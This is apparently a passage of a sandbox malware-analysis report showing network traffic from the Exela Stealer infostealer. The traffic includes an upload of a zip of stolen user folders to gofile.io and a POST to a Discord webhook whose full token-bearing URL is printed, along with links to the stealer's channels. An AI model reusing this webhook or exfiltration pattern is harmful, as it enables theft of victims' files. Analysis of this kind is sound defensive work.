                                                                                                                                                                                                                                                          Data Ascii: l)]2L6e/*1s8ID,lA=pI-&,RF:Id6;'.gl5-/0\|Ia]ej~M/A6gZCO|G?lq28!xa,c.ft!Vj21fwWBp[XyDix|}V,H%$LGb
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: b0 3f f3 6f 7d 99 5c ff 18 f0 60 85 5d 54 47 ec b7 e0 3f bb 58 d5 91 81 1d 2b 4a bb 31 0a 73 09 df 6f 2d a4 3c 86 2c 84 7c 52 b7 7a b3 1c 61 a8 cb 87 5d ef 39 3e 0a 3f 4e 2a 45 24 54 aa 5a e8 76 8a ab e3 fd 65 a0 88 c0 af f1 94 e4 40 3f ee 30 0b 2d 66 18 aa 50 42 00 6d 5e a7 f0 e1 52 75 c7 84 da a7 e9 66 5d f0 83 32 ed bd ac a2 20 ae ae 4d cf 53 73 67 76 bb 88 87 81 d8 cb 16 88 80 b4 c7 07 98 e0 dc 00 7c 44 78 2e d2 34 0d 97 a0 4d 5a 6b 04 c7 36 c0 2a f4 40 f5 ff 5f b1 4d fc c7 ee d7 bf f5 d5 5f 6d 51 fe 57 fe f0 ae 9a 28 59 8c d0 db 2a fb c6 90 9b 3f 82 0d e1 21 51 07 35 72 96 ac 5f cc fc 04 be 21 a9 65 f8 40 82 0f cd 94 75 e4 3d 56 e9 63 05 a8 7c ad 90 01 b6 e2 79 2f f0 61 aa 46 a5 b6 19 a5 65 a8 fe 5b 28 56 dd 57 27 41 ca d7 34 9c a7 18 8a f8 cf 44 63
                                                                                                                                                                                                                                                          Data Ascii: ?o}\`]TG?X+J1so-<,|Rza]9>?N*E$TZve@?0-fPBm^Ruf]2 MSsgv|Dx.4MZk6*@_M_mQW(Y*?!Q5r_!e@u=Vc|y/aFe[(VW'A4Dc
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: 57 02 ca c1 eb 4a 1a b3 75 a7 f0 85 d0 56 4e 4e a0 8d 18 21 55 04 2b b5 76 9b b6 ff 51 23 74 05 19 50 aa a8 ed 8b 54 f6 b5 bc 90 48 f1 c8 72 a0 ac 13 4f ba 6b 12 8a 65 19 38 b1 13 2d 08 8b 5b 9f c9 5c 4d 14 99 26 60 d8 59 db 45 31 cb 26 98 c2 af 23 3b 4a 0e a4 f8 26 44 13 8f 36 16 cf 25 47 52 a9 02 ad df f0 e3 5f 7e 5d c6 17 f0 d7 52 38 39 e4 7f 88 49 14 17 de 84 05 77 fd 1f f2 be d6 22 37 90 d0 d6 8d 09 bc 25 ea ea d4 f6 f9 91 cf 2a a8 d2 3d 02 26 b8 c3 ea dd a3 8a e3 f3 5e 90 d5 17 e3 8f 94 36 60 a5 3b da f1 4e e8 e2 69 fb 19 65 76 e1 8e 09 15 63 10 f6 b7 81 a5 d9 70 1d f8 53 f3 5b 6a 9b 16 fe 7d 6d 99 7d 5f 3b ce 5d 31 a1 cf 7e 21 97 af af 5e 3c 66 63 d6 b3 df ef 73 e4 82 50 f9 a5 8b d5 12 34 a7 a8 3f cb 9c 37 a4 bd 38 15 b2 77 83 58 11 27 36 4e 5a 7c
                                                                                                                                                                                                                                                          Data Ascii: WJuVNN!U+vQ#tPTHrOke8-[\M&`YE1&#;J&D6%GR_~]R89Iw"7%*=&^6`;NievcpS[j}m}_;]1~!^<fcsP4?78wX'6NZ|
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: 38 0d 6f 4e da ea 7a 0d b0 e7 06 b0 4d 0d 13 43 d8 e1 69 f0 e2 95 6f 5d 4d fe 86 7f e6 df 15 8f fd a8 99 ae ba 0f d2 aa aa 4b ba d4 eb bf cb 60 2c 66 38 a3 28 2e d2 4d e8 d1 49 87 d5 fb 06 4d 9a 32 31 78 9b 17 de 53 05 9e f3 87 04 4d 6a 4d 83 09 1b 01 bc 95 f2 2e d4 72 98 20 df cf 8d 9c af 66 43 f9 14 79 aa fd a0 6d 4f 2f b7 fe bf 1c 47 2e e6 4e cf 17 d3 76 73 c3 a5 fe 9b 0b 23 1e b2 2e 90 f2 5c 0e a7 be 94 58 9d f4 59 1b 78 e7 47 4e 3f 33 65 ed 6e 31 28 15 a6 5e 36 31 bc 1b 57 cf 16 ba ec a5 b2 f9 c4 df 00 ea 73 78 fd d8 03 b0 ee 53 5c 7d dd f0 0d c1 34 ca ff 63 ef 26 9b bf 6b af fe c6 14 a6 aa 81 06 6d 29 fe 56 3e 07 78 f9 32 d1 5d 8f 3a 48 29 2a 87 80 e1 3a d9 14 43 14 5e 8f f8 24 c4 f2 00 53 d9 ad 47 0b fc d5 af a9 d3 94 06 33 a7 fb 56 7b 6b f3 ba a9
                                                                                                                                                                                                                                                          Data Ascii: 8oNzMCio]MK`,f8(.MIM21xSMjM.r fCymO/G.Nvs#.\XYxGN?3en1(^61WsxS\}4c&km)V>x2]:H)*:C^$SG3V{k
                                                                                                                                                                                                                                                          2025-01-01 01:53:21 UTC16384OUTData Raw: 9b c2 ae a4 34 f8 86 61 73 8e 1d 25 39 7e ac aa c3 99 0c 59 c1 96 df ec 2a 5f 6d 29 39 91 81 cb 41 d4 6e 0f 85 74 75 2c 99 84 1c 42 29 6c 5f 6a 8e 6f c0 9d 12 40 84 fc e2 04 44 51 4b 25 40 b2 d3 bc 6c ec 98 38 fe 54 35 f4 55 20 eb 3d 0f 27 09 ea e2 5f c6 46 a2 bf 5d 80 b8 c2 eb 80 84 14 ca 0b 53 e5 6d fa 6c 11 f8 45 77 d3 91 f1 c5 64 26 bf fe 6a 49 92 3c 3b 46 9e 65 a2 06 94 33 8a 5a 5d ce ee 68 41 47 53 67 9c 48 34 47 fd 02 cc fc dc 6c a3 29 c3 9c 57 f4 fb fd e6 5a cd 48 1d 9b c5 3b 42 6d b5 57 59 99 35 a1 82 d5 57 c1 e1 ad b9 90 dc 24 de 92 50 e6 af bf be 33 7d 22 67 c0 03 3d 7a 7c 06 e8 23 9d f3 b2 ce 47 ff 78 bc 8e 24 ee 0c 18 f0 22 60 eb d4 ae 1a 53 7a ec 17 39 ce ef 79 b4 e6 a0 76 78 23 d1 81 88 ce bc 96 64 0b 84 13 c7 eb 23 54 d8 90 cf 56 e2 21 35
                                                                                                                                                                                                                                                          Data Ascii: 4as%9~Y*_m)9Antu,B)l_jo@DQK%@l8T5U ='_F]SmlEwd&jI<;Fe3Z]hAGSgH4Gl)WZH;BmWY5W$P3}"g=z|#Gx$"`Sz9yvx#d#TV!5
                                                                                                                                                                                                                                                          2025-01-01 01:53:22 UTC1244INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Wed, 01 Jan 2025 01:53:22 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          CF-Ray: 8faee00d6e3d5e5f-EWR
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1735696403
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9AxlDavcNZnRuBniLiUgaUn%2B%2BKVjr%2BqPn9bJkzC6y6NWvPgg%2B%2FsBpGxzfc%2FxIjT9EkUufLks7XxeS5UFyeqj0E4x5Q2OfFDaZCGhC2DBKhIcGDaX1%2FGQCmSoieXwKrnurskGcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          Server: cloudflare


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.44975845.112.123.1264433512C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-01 01:53:23 UTC132OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                                                                          Host: api.gofile.io
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.5
                                                                                                                                                                                                                                                          2025-01-01 01:53:24 UTC1113INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                          Server: nginx/1.27.1
                                                                                                                                                                                                                                                          Date: Wed, 01 Jan 2025 01:53:24 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          Content-Length: 14
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                          Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                          ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                                                                          2025-01-01 01:53:24 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                                                                          Data Ascii: error-notFound


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.44975945.112.123.2274433512C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC238OUTPOST /uploadFile HTTP/1.1
                                                                                                                                                                                                                                                          Host: store1.gofile.io
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.5
                                                                                                                                                                                                                                                          Content-Length: 79291
                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=ff19e8851a3248b39599ce8f448c0a96
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC36OUTData Raw: 2d 2d 66 66 31 39 65 38 38 35 31 61 33 32 34 38 62 33 39 35 39 39 63 65 38 66 34 34 38 63 30 61 39 36 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --ff19e8851a3248b39599ce8f448c0a96
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC127OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 7a 69 70 2d 63 6f 6d 70 72 65 73 73 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 74 65 61 6c 65 64 46 69 6c 65 73 42 79 45 78 65 6c 61 2e 7a 69 70 22 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: Content-Type: application/x-zip-compressedContent-Disposition: form-data; name="file"; filename="StealedFilesByExela.zip"
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC16384OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 44 54 42 5a 47 49 4f 4f 53 4f 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 44 65 73 6b 74 6f 70 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 63 75 6d 65 6e 74 73 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 00 00 44 6f 77 6e 6c 6f 61 64 73 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 4f 4e 42 51 43 4c 59 53 50 55 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 00 00 55 4d 4d 42 44 4e 45 51 42 4e 2f 50 4b 03 04 14 00 00 00 00 00 aa a6 9f 59
                                                                                                                                                                                                                                                          Data Ascii: PKYDTBZGIOOSO/PKYDesktop/PKYDocuments/PKYDownloads/PKYONBQCLYSPU/PKYUMMBDNEQBN/PKY
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC16384OUTData Raw: 85 23 a2 e2 88 d3 fd 0f d2 6f c9 0a b2 2a b9 75 04 d0 78 cf 36 05 0a 24 d2 74 6f c4 98 fd 0d 4f dd 44 43 12 cc a7 13 44 3f 31 86 f7 5e 7d 59 01 39 6e b1 6f 1f d1 58 7b 93 d7 3d df b3 0a e9 53 bb 29 6e ad 63 dc 78 dc 93 4f c2 aa 0d 3d 16 9d 88 49 1c 97 d8 35 8c d5 58 c8 dc cd 7b b2 a7 ab 42 d4 b6 bb d0 f7 7c 4b 84 23 eb 2c 3e ce 3c 7a 58 c9 b5 f9 cc 1a f8 e6 ed d2 b9 be 3e 30 e8 55 6b d8 c2 65 dc ae 79 1d 2c ce ce f8 cc 0c 36 94 86 1a 37 9a 63 cd 51 cf 8d 1d 9c 4b 67 9e 76 44 91 9e 6d 18 bf 20 b7 38 05 09 c0 7e 0c 7a bb 62 8d 06 48 9e a3 6d dd 53 5d d6 2e aa 73 f4 22 cf 55 8c 55 30 c1 ed b8 24 39 3b ce f1 71 40 b8 09 d6 d8 39 8c a1 73 f7 ab f9 e3 bc bb 47 35 d5 1f 86 94 5e 13 ea 8d 50 96 72 46 55 cd 02 b1 1c e9 22 12 1b 77 b1 70 00 ce 0e 0b a6 0a a9 9f 25
                                                                                                                                                                                                                                                          Data Ascii: #o*ux6$toODCD?1^}Y9noX{=S)ncxO=I5X{B|K#,><zX>0Ukey,67cQKgvDm 8~zbHmS].s"UU0$9;q@9sG5^PrFU"wp%
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC16384OUTData Raw: b3 2e 99 cf af fd f8 85 de bd b2 eb 0e c1 d8 92 cd 01 98 ed ee 0b ef 74 ce a5 bb 7b 5d cf 69 25 ad 63 f0 c5 51 15 2c eb dc 56 07 2d e5 b8 8a dc ec eb 39 60 78 4c 5c 18 e4 45 0d b8 6f db fc 98 66 7a 8a a1 45 4c cc 44 61 93 af fe 70 3d c6 75 e6 42 76 2e 14 92 f3 79 1b e1 35 96 dd 43 33 6c 03 00 ec 4e 4a 9f ea 6a 51 1b fa c8 55 b1 2d 5d e5 2c 50 5c f4 da b6 de bf cf 6b 95 63 bf 31 26 83 07 65 58 b6 33 c0 29 b7 7e 33 f2 2d 51 a6 2b 2e d9 a2 63 7a d4 12 9c 27 3a 1d be 49 80 f8 a2 a6 3f 76 16 03 b7 26 bc b6 8d be 8f a7 4f 54 8c 50 7b a1 ff 28 e0 0a 65 d9 a8 d1 f9 14 a8 4d af da 3d 05 d2 f9 68 5d 6f 64 31 84 61 bb 64 27 8f 2a 44 63 fc d4 8b 22 2e 78 94 52 5b 3e d6 ea de 66 98 1d 6a 7c e5 e3 dd d4 2f 05 97 cd 14 6f a1 56 86 69 fa 03 cf a3 e0 77 26 b4 b7 44 11 fb
                                                                                                                                                                                                                                                          Data Ascii: .t{]i%cQ,V-9`xL\EofzELDap=uBv.y5C3lNJjQU-],P\kc1&eX3)~3-Q+.cz':I?v&OTP{(eM=h]od1ad'*Dc".xR[>fj|/oViw&D
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC16384OUTData Raw: 43 46 58 2e 70 6e 67 15 93 49 8e 40 21 08 44 f7 9d f4 a1 44 c5 f1 8b 38 e0 70 ff 83 b4 bd 30 26 92 58 14 af 58 73 c4 ae 41 e3 2e dd 2e 97 97 3b 44 2c 62 2a 16 9c 5f 65 15 a5 ec 92 be cd 8d 9a cc 70 4e e1 a5 3e ba 23 dc 6a 95 a1 64 ab c9 f2 15 5b 30 04 6d 13 0d 90 4a 46 5b 2f c5 d8 6f 68 65 1c c3 98 bd a1 d1 4c 78 2f eb 1e 6c 82 58 9a 35 e7 08 d2 c6 dc 95 48 33 40 86 eb b4 3c af 12 87 79 d3 ea a9 0d c3 74 46 a9 77 22 d5 8d b1 3e e1 79 0b bb aa 24 5f a6 77 3e 0b 3d 98 de 3b e9 58 4e 73 c3 59 df f2 d8 b9 c3 d6 e2 80 82 49 c9 86 e9 ab c4 8d 01 66 f2 de 87 1b 37 94 8e d2 df 83 98 1c 85 fd fb ab d4 24 f3 b8 0e 27 9b 2a fd de a0 dc 96 9b c6 fd e8 f3 29 3e 43 3a 97 e0 e5 49 1f 7f 27 69 ff 0d 53 f7 ea 6b e9 71 93 ec 59 e3 1e 93 e5 24 29 30 88 f6 e9 c4 c7 51 a3 19
                                                                                                                                                                                                                                                          Data Ascii: CFX.pngI@!DD8p0&XXsA..;D,b*_epN>#jd[0mJF[/oheLx/lX5H3@<ytFw">y$_w>=;XNsYIf7$'*)>C:I'iSkqY$)0Q
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC13552OUTData Raw: 3b 05 1e 9e 16 4e d1 aa 4b 66 eb 6b 15 67 4d 04 a9 f1 07 a3 44 6a 68 a5 d3 07 74 34 58 ef b0 bc 92 4e 39 9e c9 86 90 27 26 93 97 ce 72 97 15 d0 0f f9 b6 d8 6e d0 63 ce ec 13 cd 1e 89 28 07 b5 ce cd 28 6b 5c 59 7a 28 9f 7d f3 df ed 00 c5 c0 c9 c0 cd b1 49 e8 7a dc ed a5 81 5f 47 b4 f5 b5 7c e4 dc 9c 48 eb ea 75 24 a2 bb 98 50 c5 86 99 26 27 e1 ae ef 83 62 55 1c 59 4e e8 37 59 2b a5 75 1a ce 96 15 86 5e 39 3d 87 87 60 97 4a 8f 91 c6 92 b3 50 cd 8a 76 96 16 dd aa 99 bb 65 eb 40 62 d9 73 01 57 00 a3 99 c7 57 a8 18 86 5f 46 f1 5a ce f1 e4 2f 62 cc 4d f8 bd 3e 20 5b 06 9c 1e da 76 da bb 96 84 f2 38 50 4e 6d a5 7e f5 e8 a0 35 bd ec 77 3c 03 8d 5f 5f f3 a9 d9 29 ee 76 ba 8c 5d 65 38 cb 75 db 2a b8 da 15 2b 67 da e8 5e 2c 35 6f d5 02 09 dd 8e aa f1 2e f9 62 ef db
                                                                                                                                                                                                                                                          Data Ascii: ;NKfkgMDjht4XN9'&rnc((k\Yz(}Iz_G|Hu$P&'bUYN7Y+u^9=`JPve@bsWW_FZ/bM> [v8PNm~5w<__)v]e8u*+g^,5o.b
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC2OUTData Raw: 0d 0a
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          2025-01-01 01:53:25 UTC38OUTData Raw: 2d 2d 66 66 31 39 65 38 38 35 31 61 33 32 34 38 62 33 39 35 39 39 63 65 38 66 34 34 38 63 30 61 39 36 2d 2d 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: --ff19e8851a3248b39599ce8f448c0a96--
                                                                                                                                                                                                                                                          2025-01-01 01:53:27 UTC449INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.27.1
                                                                                                                                                                                                                                                          Date: Wed, 01 Jan 2025 01:53:27 GMT
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          Content-Length: 439
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                                                                                                                                                                          2025-01-01 01:53:27 UTC439INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 35 36 39 36 34 30 36 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 75 6b 68 45 67 73 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 38 65 39 34 73 67 36 73 36 79 73 63 44 44 38 6a 59 39 4d 39 37 4f 4d 4b 30 36 74 69 63 33 57 62 22 2c 22 69 64 22 3a 22 66 65 32 34 63 38 35 63 2d 38 64 32 35 2d 34 36 33 34 2d 61 31 32 62 2d 30 63 39 66 31 37 39 61 62 34 36 30 22 2c 22 6d 64 35 22 3a 22 38 62 30 36 35 39 31 31 35 38 36 30 38 63 30 64 61 64 65 33 63 33 64 39 33 32 37 35 30 65 62 38 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 35 36 39
                                                                                                                                                                                                                                                          Data Ascii: {"data":{"createTime":1735696406,"downloadPage":"https://gofile.io/d/ukhEgs","guestToken":"8e94sg6s6yscDD8jY9M97OMK06tic3Wb","id":"fe24c85c-8d25-4634-a12b-0c9f179ab460","md5":"8b06591158608c0dade3c3d932750eb8","mimetype":"application/zip","modTime":173569


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          5192.168.2.449760162.159.137.2324433512C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2025-01-01 01:53:27 UTC283OUTPOST /api/webhooks/1263157181906419813/b4pV0iwlt5KWRU4QEOMzoONBAdBMW4nt-dNtrU5B2-50jsFyHabL0Uos8mtD0ZVFUQNS HTTP/1.1
                                                                                                                                                                                                                                                          Host: canary.discord.com
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                          User-Agent: Python/3.11 aiohttp/3.9.5
                                                                                                                                                                                                                                                          Content-Length: 419
                                                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                                                          2025-01-01 01:53:27 UTC419OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 53 74 65 61 6c 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d 62
                                                                                                                                                                                                                                                          Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Stealed Files***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thumb
                                                                                                                                                                                                                                                          2025-01-01 01:53:27 UTC1331INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                          Date: Wed, 01 Jan 2025 01:53:27 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          CF-Ray: 8faee0347d4078d9-EWR
                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                          Set-Cookie: __dcfduid=31c82dbec7e311ef855a22435e575669; Expires=Mon, 31-Dec-2029 01:53:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                                                                                                                          x-ratelimit-remaining: 3
                                                                                                                                                                                                                                                          x-ratelimit-reset: 1735696409
                                                                                                                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OpsPHj1u%2B9fWyIxudRQOjKrjT7gGWW0XUZFURui3yZRN3Tmpubirazoj03UXRPgAkY5%2BqL4eXxoA1vVSPrMUncgPlWBPDn86Rd8N4crodBEMDY723jRpfyPsndBuc0JDqpfSug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                                                                                                                                                                                                                                          2025-01-01 01:53:27 UTC536INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 73 64 63 66 64 75 69 64 3d 33 31 63 38 32 64 62 65 63 37 65 33 31 31 65 66 38 35 35 61 32 32 34 33 35 65 35 37 35 36 36 39 63 31 65 33 37 64 63 38 63 62 37 35 63 30 63 37 61 63 39 38 38 37 33 66 63 64 64 64 62 64 34 64 36 64 62 34 30 30 39 66 32 30 30 38 65 31 65 39 31 33 35 63 34 62 34 32 39 61 66 62 32 32 37 66 3b 20 45 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 33 31 2d 44 65 63 2d 32 30 32 39 20 30 31 3a 35 33 3a 32 37 20 47 4d 54 3b 20 4d 61 78 2d 41 67 65 3d 31 35 37 36 38 30 30 30 30 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 72 75 69 64 3d 65 30 39 39 61 35 38 30 33 63 35 37 37 63 33
